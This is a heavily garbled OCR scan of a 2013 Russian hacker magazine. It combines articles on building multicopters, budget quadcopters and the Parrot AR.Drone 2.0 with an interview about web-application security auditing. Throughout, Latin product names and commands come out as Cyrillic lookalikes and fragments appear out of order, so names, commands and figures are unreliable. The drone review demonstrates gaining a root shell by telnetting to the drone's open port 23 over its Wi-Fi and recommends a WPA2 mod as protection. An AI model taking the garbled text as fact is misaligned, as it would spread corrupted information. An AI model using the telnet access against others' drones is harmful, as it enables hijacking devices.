с процессором 328р, 3244 или 1280/2560 и хотя бы одним дат- 
чиком-гироскопом. АгиСор{ег — проект, напичканный всевоз- 
можным функционалом от простого висения до выполнения 
сложных маршрутных заданий, но требует особого железа, 
основанного на двух чипах АТтеда. МедаРижеМС — это клон 
АгаиСортег, который способен запускаться на обычной ардуине 
с чипом 2560 и минимальным набором датчиков из гироскопа, 
акселерометра, барометра и компаса. Поддерживает все те же 
возможности, что и оригинал, но всегда догоняет в развитии. 

С железом для открытых проектов аналогичная ситуация, 
как и с рамами для коптера, то есть ты можешь купить готовый 
контроллер или собрать его самостоятельно с нуля или на ос- 
нове Агдаито. Перед покупкой стоит всегда обращать внимание 
на используемые в плате датчики, так как развитие технологий 
не стоит на месте, а старье китайцам как-то надо распродать, 


Для полетов с камерой 
обзаведись подвесом, 
который будет удержи- 
вать камеру параллельно 
горизонту при манев- 
рах, атакже поможет 
управлять наклоном 
камеры. Большинство 
контроллеров имеютвы- 
ходы для стабилизации 
подвесов с сервопри- 
водом, атакже выход 
для переключателя 
управления кнопкой 
спуска камеры. 


БЕЗОПАСНОСТЬ 


Все новички, думая о безопасности, вспоминают АВ.Огопе 

и его защиту винтов. Это хороший вариант, и он работает, 

но только на мелких и легких аппаратах, а когда вес твоего 
коптера начинает приближаться к двум килограммам или 
давно перевалил за эту цифру, то спасти может только прочная 
железная конструкция, которая будет весить очень много 

и, какты понимаешь, сильно уменьшит грузоподъемность 

и автономность полета. Поэтому лучше сперва тренироваться 
подальше от людей и имущества, которое можно повредить, 


к тому же не все сенсоры могут поддерживаться открытыми 
прошивками. 

Наконец, стоит упомянуть еще один компьютер — РХ4, отли- 
чающийся от клонов Агито тем, что у него есть УМХ-подобная 
операционная система реального времени, с шеллом, процес- 
сами и всеми делами. Но надо предупредить, что РХ4 — плат- 
форма новая и довольно сырая. Сразу после сборки не полетит. 

Настройка полетных параметров, как и программы настрой- 
ки, очень индивидуальна для каждого проекта, а теория по ней 
могла бы занять еще одну статью, поэтому вкратце: почти все 
прошивки для мультикоптеров основаны на Р!-регуляторе, 
и основной параметр, требующий вмешательства, — пропор- 
циональная составляющая, обозначаемая как Р или гаеР. Если 
при взлете твой коптер дергается из стороны в сторону, то это 
значение надо уменьшать, если же вяло реагирует на внеш- 
ние воздействия, то наоборот — повышать, остальные нюансы 
ты сможешь найти в инструкциях и на сайтах разработчиков. 


УПРАВЛЕНИЕ 
Немного про радиоаппаратуру. Сейчас практически все пере- 
датчики для летающих моделей работают на частоте 2,4 ГГц. 
Они достаточно дальнобойные, и этот частотный диапазон 
не так зашумлен, как, например, 900 МГц. Для полета вообще- 
то достаточно четырех каналов: газ, рыскание, тангах, крен. Ну 
а восьми каналов точно хватит и на что-нибудь еще. 

Комплект обычно состоит из самого пульта и приемника. 
На приемнике находятся ручки управления и дополнительные 
кнопки. Обычно выбирают аппаратуру Моае2, когда левый стик 
управляет газом и поворотом, а правый — наклонами коптера. 
Все ручки, кроме газа, подпружинены и возвращаются в на- 
чальное положение при отпускании. Также стоит обращать 
внимание на количество каналов. Для беспилотника потребу- 
ется четыре канала управления и один канал для переключения 
режимов полета, кроме того, могут потребоваться дополни- 
тельные каналы для управления камерой, для настройки или 
для особых режимов полетного контроллера. При выборе пуль- 
та стоит также учитывать возможность смены радиомодуля, 
чтобы в будущем его можно было легко обновить. = 


а уже по мере улучшения навыков защита станет и не нужна. 

Но даже если ты пилот со стажем, то не забывай о технике без- 
опасности и продумывай возможные негативные последствия 
твоего полета при нештатных ситуациях, особенно при полетах 
в людных местах. Не стоит забывать, что сбой контроллера или 
канала связи может привести к тому, что аппарат улетит от тебя 
далеко, и тогда для поиска может пригодиться СР$-трекер, 
установленный заранее на коптер, или же простая, но очень 
громкая пищалка, по звуку которой ты сможешь определить его 
местоположение. Настрой и заранее проверь функцию Та! зае 
твоего полетного контроллера, которая поможет приземлиться 
или вернуть коптер на точку старта при потере сигнала с пульта. 
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Бюджетные квадрокоптеры 
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У 


Александр Расмус 


АВ.Огопе — аппарат, заслуживший популярность как благодаря соотношению 
цены и функционала, так и за счет доступности (его часто можно встретить 
даже в обычных магазинах электроники). Тем не менее это далеко не един- 
ственный готовый аппарат, и при желании можно найти машинку и подешевле. 


\ММАЕКЕВАОВ 
ГАБУВГАО 


а00.а/@МУ 


[ааубта, скорее, миниатюрная игрушка с сим- 
патичным дизайном и по возможностям вряд 
ли сможет тягаться с крупными собратьями. 
Ее вес составляет около 30 г, а время поле- 

та — менее десяти минут. Однако функционал 
(в зависимости от модели) у нее доволь- 

но внушительный. Самая дешевая модель 
обойдется в 35 долларов, самая дорогая 

(и оснащенная камерой ЕР\У, передающей изо- 
бражение на экран пульта) — до 200 долларов. 
На доставку нужно заложить еще 50 долларов. 
Управляется «божья коровка» не смартфо- 
ном, а радиопультом, работающим на частоте 
2,4 ГГц, и в разных конфигурациях встречаются 
разные версии контроллера — от самого про- 
стого ОЕ\О 4 до самого продвинутого ОЕ\МО 7. 
В общем, неплохая модель для того, чтобы 
поиграться в помещении. 


СВА2УРЫЕ МАМО 
ОЧАОВОСОРТЕВ 


а00.Ч/\АИрРТ 


Еще более компактный аппарат, относящийся 

к классу РСВ-коптеров. Это означает, что ос- 
новой для рамы служит сама печатная плата 
бортового компьютера. Благодаря этому вес 
устройства составляет 19 г. Время полета — 

до семи минут. По задумке создателей, этот 
аппарат лучше всего подойдет для разработки 

и прототипирования — на сайте доступны все 
исходные коды, а само устройство значитель- 

но проще, компактнее и безопаснее крупных 
моделей. Управление производится с компьюте- 
ра — для этого в комплект входит ЧУЗВ-приемник 
для 2,4-гигагерцевого радиосигнала. Самая де- 
шевая модель обойдется в 149 долларов, самая 
дорогая — в 179 долларов. Доставка станет еще 
в 35-60 долларов, в зависимости от выбранной 
службы. Отличие более дорогой версии — в до- 
полнительных сенсорах. 


О-ВОТ МСВО 
ОЧАОВОСОРТЕВ 


оо.аи/й\мМК 


Еще один бюджетный аппарат, стоимость 
которого начинается от 30 долларов, еще 
столько же стоит доставка. Следует учиты- 

вать, что в комплект не входит пульт, но Мсго 
Очцаагосор{ег совместим со стандартными 
контроллерами. Плюсом является и то, что в по- 
ставке идет сразу два аккумулятора, атакже на- 
бор запасных пропеллеров. Это важно, так как, 
по отзывам владельцев, лопасти достаточно 
часто слетают при падении и из-за маленького 
размера их бывает непросто найти. Вес состав- 
ляет 26 г, время полета — около десяти минут. 
По замыслу создателей, этот аппарат подходит 
для сложных маневров, поэтому малютка 
поддерживает несколько режимов скорости 

и управления. При переключении в так называ- 
емый акробатический режим аппарат становит- 
ся более чувствительным к управлению. 
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Как тебе уже должно было стать понятно к этому моменту, сборка квадрокоптера — увлека- 
тельная, но непростая затея. Для тех, кому интереснее ковыряться с софтом, а не сборкой, 
лучше подойдут готовые модели. В 2010 году компания Раго{ выпустила рыночную версию 
квадрокоптера АН.Огопе. Это было первое решение для массового потребления, которое име- 
ло адекватную цену и полную открытость для энтузиастов электронщиков и программистов. 
Аппарат стал однозначным хитом. В данной статье мы хотим рассказать о второй версии этого 
квадрокоптера — АН.Огопе 2.0, который вышел в 2012 году. 


ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 
Квадрокоптер Рагго{ АА.Огопе 2.0 оснащен четырьмя моторами мощностью 
14,5 Вт, которые выдают 28 500 ВРМ. В редукторе используются шестерни 
из нилатрона для понижения шумов. На контроллере каждого мотора ис- 
пользуется 8 МР$ А\/В СРУ, а сам контроллер влагоустойчив. Максимальная 
скорость полета — 18 км/ч. На борту квадрокоптера установлены две видео- 
камеры: 
. фронтальная НО-камера с разрешением 720р, 30 ЕР$ с углом объектива 
в 92 градуса; 
нижняя О\СА-камера (320 х 240), 60 ЕР$ с углом объектива 64 градуса. Ее 
АВ.Огопе также использует для замеров горизонтальной скорости. 


«Мозги» дрона представляют собой 1 ГГцАВМ Сонцех А8 процессор с 800 Ги 
ОЗР ТМ$3200МС6Ах для видео, 1 Гбит ООВ2 ВАМ на 200 МГу. И управляется 
это все с помощью Шпих 2.6.32. Соединение с «пультом» управления (которым 
в штатном варианте являются Ю5$- и Апагоа-девайсы) происходит по \М-Н. 
Так что коптер несет на себе \М-Е!-точку. Ориентация в пространстве проис- 
ходит за счет трехосевого гироскопа, трехосевого акселерометра, трехосе- 
вого магнитометра (магнитный компас), датчика давления и ультразвукового 
высотомера (на самом деле дальномера). На борту также есть УЗВ-разъем 
для подключения внешнего накопителя. СОР$-приемника в штатной комплек- 
тации нет, но об этом чуть ниже. 

Несмотря на то что АА.Огопе — это коммерческий продукт для конечного 
потребителя, его компоновка позволяет без проблем подключать к нему до- 
полнительные аппаратные компоненты или вмешиваться в работу существу- 
ющих. При подвеске на дрон дополнительного оборудования весом до 150 
граммов это не сказывается на качестве его полета — динамике и стабили- 
зации. При подключении аккумулятора к квадрокоптеру происходит загрузка 
его ОС и инициация систем. Также включается \\!-Н!-точка, к которой можно 
подключиться любым \\-Н-устройством. Изначально управление коптером 
доступно только с Ю5$- или Апагою-девайсов, но на мож- 
но найти способы для подключения с ноутбуков и настольных ПК с \М-Н. По- 
скольку у АВ.Огопе есть открытый АР|, то подключаться к нему можно с чего 
угодно, лишь бы там работал софт с использованием штатных библиотек. 

В базовом функционале квадрокоптер формирует пару с мобильным 
устройством и в дальнейшем подключение к его \ММ-Е!-точке возможно только 


$ОК/АР! 


с этого устройства. И разумеется, есть возможность разрыва пары при необ- 
ходимости. Использование \\-Е! — определенная дыра в безопасности дрона. 
Почему? Да все очень просто: подключаемся ноутбуком к его точке. Зная его 
|Р-адрес, запускаем сканирование портов и получаем, что 23-й порт открыт. 
Подключаемся к дрону: 


> фе1пе{ 192.168.1.1 23° | в 
ВизуВох \1.14.0 () Би11{-1п $Пе11 (а$В) | 
Епфег 'Пе1р’' Рог а 115% о+ Би11*-1п соттап@$. 


еспо Ф$И5ЕК 
гооЕ 


Таким образом, мы просто можем зайти на квадрокоптер с правами госф. 
Что это дает? Ну, например, в рамках контеста Розйме Наск Вау$ СЕТ 2012 
было задание на перехват управления дроном, которое успешно решили. 
А на соревновании Огопебате$ 2012 был продемонстрирован вирус, которым 
заражался один дрон, и далее тот начинал заражать им другие дроны в зоне 
видимости, перехватывая управление ими. Имея под рукой ВизуВох и рутовый 
доступ кнему, можно делать и не такое. Это полезная функция для энтузиастов, 
но дыра в безопасности для злоумышленников. Поэтому для \ММ-ЕГ АВ.Огопе 
можно установить защиту \МРА2, используя мод агагопе-\мра2 из СИНивВН, и за- 
щитить свой дрон от кулхацкеров. Еще один недостаток \ММ-Е! — у него ограни- 
ченный радиус действия, при выходе из которого квадрокоптер принудительно 
приземлится. Что будет под дроном в этот момент: ровная площадка, лес или 
вода, — его не сильно волнует. Конечно, можно без проблем поставить более 
мощную М/-Н-антенну для расширения радиуса, но есть и другие способы. На- 
пример, при помощи Агдипо и типовых для авиамоделирования модулей при- 
емника и передатчика радиус полета дрона повышается до 1,5-2 км. Но можно 
сделать радиус полета вообще практически бесконечным — с помощью той же 
Агацто и @ЗМ-модуля координировать полет дрона можно через сотовую сеть. 
Главное, чтобы в зоне полета было устойчивое сотовое покрытие. 


ГЛАЗА 
Видеокамеры, установленные на борту квадрокоптера, играют разные роли. 
Фронтальная камера транслирует видеопоток 720р по \М-Е! на управляющее 


устройство. Можно записывать этот поток на устройстве (эту функцию пред- 
лагают стандартные приложения) или подключить внешний ЧУЗВ-накопитель 
к самому дрону, и запись будет вестись на него. На накопителе должно быть 
минимум 100 Мб свободного пространства и файловая система ЕАТЗ2. 

Вертикальная камера, расположенная в нижней части корпуса дрона, дает 
О\МСА-разрешение. В ПО АВ.Огопе заложена функция отслеживания горизон- 
тальной скорости с использованием вертикальной камеры по принципу, ана- 
логичному принципу в компьютерных мышках. 

Говоря о видео, нельзя не упомянуть звук: микрофонов на борту АВ.Огопе 
нет. Это понятно, потому что шум от четырех моторов забил бы любой микро- 
фон. Опыты, проведенные с подвешиванием камер СоРго к АВ.Огопе и запи- 
сью видео со звуком, показали, что качество звука даже при использовании 
алгоритмов шумоподавления оставляет желать лучшего. Но что мешает кому- 
то выйти с гениальным решением этой проблемы и удивить весь мир? 

При всем при этом на борт дрона можно установить динамик и, пролетая 
над компанией друзей, транслировать Вагнера и его «Полет валькирий». 


КРЫЛЬЯИ ТЕЛО 
Эксплуатация дрона предполагается как в помещении, так и на открытых 
пространствах. В комплекте предусмотрены два сменных кожуха из вспе- 
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ненного полипропилена. Этот материал легок, но обеспечивает достаточ- 
ную жесткость конструкции. Кожух для полетов в помещении имеет за- 
щиту винтов, которая сможет предохранить от несильных столкновений. 
Для полетов на открытом пространстве используется облегченный вари- 
ант кожуха, не имеющий защиты винтов, как следствие, он весит почти 
в два раза меньше. 

Поведение в воздухе регулируется настройками приложений. Углы, ско- 
рости реакций, ограничения высот и ряд других параметров хорошо регули- 
руются настройками. Квадрокоптер умеет делать боковой переворот на 360 
градусов. Выполнять этот маневр лучше с запасом высоты, так как на завер- 
шающем этапе он теряет где-то 40-50 см высоты. Остальные же маневры 
выполняются в штатных приложениях или за счет наклона устройств, тогда 
приложение получает информацию с гироскопов мобильного устройства 
и передает команды на рули, или за счет нарисованных на экране джойсти- 
ков. Возможна и комбинация этих методов. 

При полете в помещении можно включить функцию поддержания высоты, 
которую дрон определяет с помощью ультразвуковых дальномеров (на вы- 
сотах менее 6 м), но тут есть особенность: если в комнате стоит стол, то, 
пролетая над ним, дрон немного наберет высоту, так как поверхность (стол) 
стала к нему ближе, чем была (пол). Надо учитывать это, чтобы квадрокоптер 
не уперся в потолок. 

Также у дрона есть функция стабилизации полета, которая пригождается 
как в помещении, так и вне его. В помещении винты квадрокоптера создают 
воздушные возмущения, которые, отражаясь от близко стоящей мебели или 
других предметов, способны влиять на сам квадрокоптер. Поэтому в плотно 
заставленных комнатах дрон немного покачивается от собственных воздуш- 
НЫХ ПОТОКОВ. 

Вне помещений стабилизация пригождается для борьбы с ветром. 
При слабом ветре дрон достаточно хорошо себя стабилизирует, но на силь- 
ном (особенно на высоте) его заметно качает. Говоря о метеоусловиях, нельзя 
не упомянуть, что инструкция не рекомендует использовать АВ.Огопе в дождь 
и снег — многие элементы (контроллеры моторов, сами моторы) открыты 
и подвержены коррозии. 


ТБ ЮБИЛЯТИТИО 
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Итак, что же в этом АВА.Огопе такого, что им увлеклось столько 
людей? Есть же другие квадрокоптеры, которые могут, в отличие 
отАН.Огопе, нести до килограмма полезной нагрузки. Могут на- 
ходиться в воздухе до часа, при этом активно транслируя видео 
и навигационный поток на землю. Они же могут летать в плохих 
метеоусловиях, будь то проливной дождь или сильный снего- 
пад. Круто? Ну круто же! А сколько они стоят? Как правило, это 
профессиональные летательные аппараты и цены исчисляются 
тысячами и десятками тысяч евро. И да, у многих других квадро- 
и октокоптеров есть свои АР! и ЗОК, но нет такой популярности. 
Но вряд ли найдется много желающих разбирать свой квадро- 
коптер за 2 тысячи евро, чтобы подключить к нему Агдаито или 
какую-то дополнительную плату. Да и производители подобных 
коптеров не сильно стремятся пускать энтузиастов внутрь своих 
устройств. Так что же такое АН.Огопе? Можно сказать, что это 
Агаито в мире любительских летательных аппаратов. Это плат- 
форма по скромной для рынка этих аппаратов стоимости, кото- 
рая позволяет любому энтузиасту авиамоделисту, электронщи- 
ку или программисту реализовывать свои идеи. Не зря вокруг 
этого продукта собралось такое сообщество и такое количество 
различных модификаций и усовершенствований. Подходит 
этот квадрокоптер и для тех, кто видит в нем лишь средство 
для игры, — интеграция из коробки со смартфонами и интуи- 
тивное управление позволяют использовать его по принципу 
«включил и играй». Доступность устройства тоже вносит свой 
вклад — в отличие от многих других квадрокоптеров, АН.Огопе 
есть в наличии во многих розничных магазинах России, и дале- 
ко не только в Москве. Так что хочется надеяться, что компания 
Рагго{ продолжит развитие линейки АА.Огопе, чтобы все увле- 
ченные летающими роботами люди смогли реализовывать свои 
идеи. АВ.Огопе — это и игрушка, и инструмент, и каждый исполь- 
зует его так, как болыше хочется. == 


При запуске одной из миссий в пространстве вокруг дрона (виртуальном, 
естественно) появляются различные предметы, которые надо собирать. Ко- 
личество зависит от объема доступного помещения. По мере сбора пред- 
метов начинают появляться неприятельские летательные объекты, которые 
надо сбивать ракетами. 


АВ.Васе — для этого приложения требуются физические аксессуары: 
«пончики», через которые надо пролетать, и финишные конусы. Суть — 
гонки на время через подготовленные трассы. 


Еще одна интересная встроенная фича — это «тусовка» «пилотов», на- 

зываемая АВ.Огопе Асадету. Это облачное хранилище информации 
о твоих полетах. Для того чтобы в него попасть, нужно пройти регистрацию 
(прямо из мобильного приложения), и в соответствии с заданными настрой- 
ками туда будет сохраняться информация о полетах. Собираться будет те- 
леметрия полета, снятые видео, координаты. Там же можно ставить оценки 
полетам других людей и смотреть на карте интересные споты для полетов 
в твоей окрестности. Хороший способ найти места, где чаще всего бывают 
единомышленники. Ну и проверить, поставили ли они \М/РА?-шифрование 
на свои дроны... 


Карта спотов 
напримере 
Москвы 


Долгопрудный О.  ® [ел г 
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МОБЕСОРТЕВ 


Продолжая тему программного управления АВ.Огопе, нельзя 

не коснуться мода под названием Модесорхег. Это мод, с исполь- 
зованием которого управлять полетом дрона можно с помощью 
Моде.]5. Для разработчиков это несколько более дружественный 
способ, нежели писать и компилировать код на Си с использова- 
нием АР!-библиотек. Это также снижает некий «порог вхождения» 
за счет того, что разработка под Моде. значительно проще, чем 
под Си, и таким образом большее количество людей может при- 
нимать участие в программировании под АН.Огопе. 

Мод позволяет получать данные сенсоров и простыми опера- 
циями передавать команды дрону. Подобные скрипты часто ис- 
пользуются на мероприятиях для предварительного программиро- 
вания программы полета дрона и дальше запуска демонстрации. 


бР$, ОбВОиМОСОМТВОЕ 
И ПОЛЕТ ПО ВЕЙПОИНТАМ 


С помощью Моде.]5 можно раздавать коптеру команды лишь 

в стиле «повернись направо на 0,5», «сделай флип налево» и про- 
чее в таком стиле. Но для полета по маршруту этого мало или 

как минимум это неудобно. Встроенного ОР$-приемника в квадро- 
коптере нет. Проблема решается разными способами. Например, 
возможна установка на него внешнего СР$-приемника с помощью 
Агаито. Также Рагго1 в феврале этого года анонсировала выпуск 
подключаемого СР$-модуля. Он подключается к бортовому ЧЗВ- 
разъему и передает координаты устройству. Кроме того, он содер- 
жит в себе четырехгигабайтный накопитель и выполняет функцию 
флешки для записи видео. Анонсированный модуль поддерживает 
протокол МА\МИпкК, что дает возможность использовать, напри- 
мер, софт ОСгоипаСотта|, с помощью которого можно расставить 
заранее маршрутные точки и запустить дрон для полета по ним. 

А поскольку МА\МИпк имеет открытый исходный код и АРП, это по- 
зволяет писать любой софт для навигации дрона. 


ДОПОЛНИТЕЛЬНЫЕ 
СЕНСОРЫ 


Открытость платформы АР.Огопе и доступность его аппаратных 
компонентов делают его легко модифицируемым. С помощью 
мода Огопаито можно без труда интегрировать АВ.Огопе с Аг!ипо 
Мапо. Таким образом можно совместно использовать возмож- 
ности платформ и добавлять на квадрокоптер дополнительные 
сенсоры, системы навигации, освещение, звуковые динамики, 
управление с джойстика и многое другое. 

Интеграция управления АВ.Огопе с такими девайсами, 
как Мищепао \М/1 и Мсгозой Ктес, уже давно не фантастика. 
Сенсоры распознают движения «пилота» и передают команды 
на квадрокоптер. Да, написание софта для Мсго5о Ктес{ требует 
определенной квалификации, но для того АРИЗОК и делаются. 
Но если посмотреть дальше, то выходит, что «пульт» уже и не так уж 
нужен. На Кск$ащег был размещен девайс под названием МУО — 
это браслет, который надевается на руку, получает информацию, 
считывая электрическую активность в мышцах двигающейся руки, 
и передает команды по Виеоотй. В проморолике было показано 
управление АВ.Огопе с помощью такого браслета. Он еще недосту- 
пен публично и все еще ожидает своего выхода на рынок, но роли- 
ки выглядят крайне многообещающе. То есть, если предположить, 
что проблему управления дроном мы решили и пульт больше 
не нужен, осталось решить вопрос с выводом телеметрии дрона. 
И туг приходит мысль об очках. Ведь если вывести всю необходи- 
мую информацию на очки и обеспечить управление с помощью 
носимого браслета, то и пульт больше не нужен. 
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Этого человека многие знают как Владимира Воронцова. Другие как 907прр. 
И не так уж важно, что на самом деле его зовут Иван Новиков. Главное, 

что это один из самых идейных м/ПКервагов России. Он знает почти все о без- 
опасности веб-приложений. И своим примером показывает, что эти зна- 

ния можно пустить в правильное русло, не только делая мир безопаснее, 

но и строя на этом успешную технологическую компанию. 


\МНИТЕНАТ \$ ВЕАСКНАТ 

Я всегда был идейным мпКепвагом. Никогда не «болтал- 
ся в воздухе», никогда не был в положении «я студент, и мне 
нечего делать». После поступления в университет сразу 
началась работа, так что времени не оставалось. А тратить 
свое свободное время на то, чтобы чем-то рискнуть, что- 
нибудь взломав... это полный бред. Меня такие мысли ни- 
когда не посещали. 

У блэков есть интуиция. Обычно все сразу понятно 
по скиллам. Даешь человеку тестовое задание, наблюда- 
ешь за ним и, как правило, сразу понимаешь, что он делал 
раньше. Блэки не пытаются найти уязвимости типа пачки 
Х$$ — они пытаются добиться фактического результата, 
разными способами. 

Вообще, заработать можно на чем угодно. Вопрос 
лишь в том, чего ты хочешь. Если ты хочешь зарабатывать 
деньги, ты вряд ли станешь заниматься безопасностью — 
это, пожалуй, самый трудоемкий и глупый способ для этого :). 

Да, говорят, что МаскКпагы получают больше. Од- 
нако непонятно, что они на самом деле творят — ломают, 
вирусы рассылают или еще что. Есть черные $ЗЕО, которые 
получают много денег. Однако в основном они занимаются 
нетехническими вещами. 

Мне смутно кажется, что люди, ломающие что-то 
руками, все равно нуждаются в каких-то еще скиллах. 
И я сильно сомневаюсь, что многие ШаскпаГгы хорошо за- 


рабатывают. Большинство из них воспринимают происхо- 
дящее как игру. Или занимаются откровенным криминалом, 
как те же кардеры. Если они и зарабатывают, то вовсе не по- 
тому, что хорошо ломают, а потому, что у них есть некая своя 
фишка — умение что-то организовать, сделать, закрутить. 
Это никак не связано с компьютерами. 

Просто нужно понять, что тебе нужно от жизни, и за- 
ниматься именно этим. 

Репутация — очень сложная штука, которую зараба- 
тывать надо годами, а потерять можно за минуту. 

Как я попал в ИБ? Не сразу. Пришел, как и все, из ин- 
тереса. Первый компьютер, 2О$, бейсик, программирова- 
ние — примерно такая последовательность. 

Но сначала я пошел работать не в ИБ, а как все — 
программистом. Поработал какое-то время, а потом 
В 2009 году был конкурс по обходу проактивной защиты 
в движке ВИих на Спао$ Соп${гисйоп$. Я прошел его и по- 
нял, что пора менять работу. В результате отправился 
устраиваться в Роме Тесппоод!е$, но меня туда не взя- 
ли. Тогда я подумал-подумал и решил, что буду делать 
аудиты сам, — ну а чего здесь такого? :) 

Когда я выиграл конкурс, в новостях опубликовали 
ссылку на ОМ№ес.ги. Там был блог с уязвимостями, кото- 
рые были найдены по Ти! 415созиге, и кнопочка для оформ- 
ления заявки на заказ аудита веб-приложения. Так и нача- 
лась история компании ОМ№$ес. 


ФАКТЫ 


Один из основателей 
стартапа О№зес. 


Окончил физфак МГУ. 
Работает на Мас, так 


как «не сумел найти 
ноутбука удобнее Ай». 
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Зарабатывать репутацию можно по-разному, глав- 
ное — результат. Тебя должны рекомендовать. Нет для ре- 
путации ничего лучше, чем положительный (отличный, вос- 
хищенный) отзыв о проведенном аудите на каком-нибудь 
закрытом ивенте между заказчиками. Громкие достижения 
тоже важны. 

Поэтому в конкурсах стараюсь участвовать до сих 
пор, чтобы показать — мы на волне, живы, развиваемся, 
не окостенели. И сам конкурсы стараюсь устраивать. 


ВСЕ ВКЛЮЧЕНО 

Фаундеров ОМ№ ес исторически трое: Настя, я и Саша. 
Саша отвечает за сеть, наше облако, всю инфраструктуру 
и администрирование. Я занимаюсь алгоритмами и аудитом. 
Настя... Настя обеспечивает нам жизнь в «идеальном мире», 
чтобы мы могли работать, пока она занимается всем осталь- 
ным — бухгалтерией, кадрами, налогами, заказчиками, дого- 
ворами и прочим. Она администратор. 

Людей в компанию я находил, можно сказать, по кру- 
пицам. Некоторые участвовали в наших квестах, некоторые 
ушли из каких-то конкурирующих организаций. Бывает и так, 
что человек приезжает в Москву, оканчивает университет, ра- 
ботает здесь год и понимает, что смысла здесь жить просто 
нет. И едет человек домой, в прекрасный, зеленый Алтайский 
край. Получает там почти те же деньги, что и в Москве, но чув- 
ствует себя человеком, ловит рыбу сетями — ему классно. Так 
что у нас много удаленщиков — из Якутии, Читы, Украины, Гер- 
мании и других мест. 

Мы ищем людей не по каким-то шаблонам, типа 
«программист», — мы ищем именно людей. Главное, чтобы 
человек был хороший. 

Конечно, смотрим на общение, проводим анализ 
бэкграунда, но на первом месте стоит интерес самого чело- 


ЧЕЛОВЕК 

НА ДАННЫЙ 
МОМЕНТ РАБОТА- 
ЮТВ КОМПАНИИ 
ОМЗЕС. НЕМАЛАЯ 
ЧАСТЬ УДАЛЕННО 
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века. Если есть желание — все остальное приложится. Только 
желание должно быть где-то на уровне мании, одержимости. 
Когда с таким человеком общаешься — не важно, лично, через 
ЗКуре или даже почту, — сразу чувствуется эта одержимость. 
И значит — сработаемся. 

Сейчас нас получается человек 17—20. Удаленщиков 
много. На каждый конкретный проект привлекаются разные 
люди, в зависимости от задач. 

Пентестов мы вообще-то не делаем. Мы проводим ау- 
диты веб-приложений. Иногда проводим стресс-тестирование 
веб-приложений, тесты «на пробив». 

Пентест — это задачка на пролом системы. Понятно, 
что он производит вау-эффект. По итогу пентеста ты отве- 
чаешь на вопрос, можно ли это взломать за такое-то время. 
Но пентест никак не помогает организовать эту самую без- 
опасность. Спустя месяц ты можешь заказать еще десяток 
пентестов, и тебя еще десять раз сломают. Если ты не будешь 
концептуально предпринимать никаких мер, ничего не изме- 
нится. 

Пентесты, возможно, имеют какой-то смысл в корпо- 
ративных сетях — там есть некие базовые вещи и понятно, 
как их настроить. Но в веб-приложениях все зависит от самого 
кода, там ничего не понятно, нет никаких гайдов. 

В аудите все по-другому — его идеология позволяет 
найти как можно больше всего (это будут не только какие-то 
реально эксплуатабельные уязвимости), общие вещи, кото- 
рые нужно править. 

Чтобы все это лучше продавалось, мы, конечно, вы- 
полняем какие-то «пробивы», вроде пентестов. Берется 
одна из тысячи найденных уязвимостей, эксплуатируется, 
и клиенту демонстрируется, как мы с ее помощью получаем 
полный доступ. Но в масштабах аудита это лишь небольшая 
работа на вау-эффект, чтобы тебя запомнили. 


ХАКЕР 07 /174/ 2013 


Основная работа — это изучение всего-всего. 
Она очень методичная, во многом неблагодарная, полуавто- 
матизированная, а иногда и ручная... В общем, унылая работа. 

Мы проводим и м/ИКе Бох, и Шаск Бох. Без исходных 
кодов и с ними. Что труднее? Не знаю, не могу разделить. 

Бывают очень простые мПКе Бох, когда приложение на- 
писано очень просто. Все потенциальные точки входа сосре- 
доточены в одном месте, которое можно быстро проверить 
и сказать «все плохо» или «все хорошо». А все остальное — 
просто обвязочки, расширяющие эти точки входа. Такие при- 
ложения бывают. 

Но бывают очень сложные Шаск Бох. Бывает наоборот. 

Сканер в таком деле не поможет. Мы исходим из того, 
что сначала нужно узнать приложение, понять, что и как оно 
делает. И только потом начинаем ломать. Нередко новый биз- 
нес какой-то для себя открываем, особенности, процессы. 

Мы вручную изучаем приложение, составляем об- 
щую картину того, что в нем есть. Исходя из нее, смотрим, 
к чему стремимся и где есть потенциальные проблемы. Мы 
пытаемся их предсказать. Садимся и обсуждаем, как мы про- 
ломим это приложение, в каких конкретно местах. Затем за- 
нимаемся сбором информации «вокруг периметра», изучаем 
приложение глубже, составляем всякие деревья вызовов. По- 
том в ход идут техники фаззинга, еще что-то — различные ав- 
томатизированные вещи. Ошибки логики ловим руками. 

Для Ыаск Бох мы используем Вигр ЗиКе, ничего лучше 
пока не видели. Для него у нас есть свои плагины и тулзы. Ни- 
каких Асипейх не применяем, они бесполезные и бестолковые. 

Для мПКе Бох у нас есть свой сканер, статический 
и динамический анализатор. Их мы писали сами. Кстати, 
еще динамический сканер для РНР Артур Геркис писал, когда 
с нами работал. Утилита называется РУТ — РНР Уцпегаб!ез 
Тгасег, исходники сейчас выложены. 

Фаззеры пишем «на месте». Ведь каждый фаззер уника- 
лен. Когда нужен, тогда и пишем. Пишем на чем угодно, чаще 
всего — на Вибу и РНР Либо можно многое подфаззить через 
Вигр штиаег. Как правило, вещи вроде переборов мы дела- 
ем просто на \гиаег. Там же есть и БК Йр’ы. А всякие хитрые 
штуки, с обработкой рауюаа’ов и фильтрами, обычно пишем 
на Вибу или РНР. 

Конечно, бывает, что к нам приходят и за пентестами 
веб-приложений. Мы можем сделать и это. Но мы пытаемся 
донести до людей, что сначала им нужен аудит, а уже потом 
можно провести пентест для проверки. 

Как правило, после нашего аудита кому-то еще за- 
казывают пентест, а нам заказывают пентест после чьего-то 
аудита. Это нормально, я вообще не совсем понимаю ком- 
пании, которые придерживаются идеологии «это наш клиент, 
и будем с ним всю жизнь». Подобное невыгодно клиенту, ему 
выгодно менять команды и получать наиболее объективную 
оценку фактического уровня безопасности. 

Цена аудита на данный момент составляет от 100 
тысяч рублей и до бесконечности. Максимальная сумма 
зависит от многих факторов, но, наверное, это порядка не- 
скольких сот тысяч долларов. Это, скажем, аудит большого, 
многомиллионного ресурса. 

По времени аудит занимает от двух-трех недель 
до шести месяцев. У нас были проекты и по четыре месяца. 
Это аудит исходников, когда приложение многоплатформен- 
ное, много кода на разных языках (С, уама, куски на РНР). 

Мы работаем очень дотошно. Вообще стараемся 
не брать проекты «внахлест» и поэтому не всегда и не всех мо- 
жем взять сию минуту и начать проект. Бывает, проекты дела- 
ем долго, но непременно хорошо. 


КАК СДЕЛАТЬ ХОРОШИЙ \М/АЕ 
Началось все с того, что мы спокойно делали аудиты. 
Жили себе и жили. Но каждый раз, когда мы заканчивали аудит, 
оказывалось, что заказчик хочет, чтобы мы по итогам аудита 
еще и приняли какие-то меры, что-то изменили в его системе. 
Нам предлагали дополнительные деньги за настрой- 
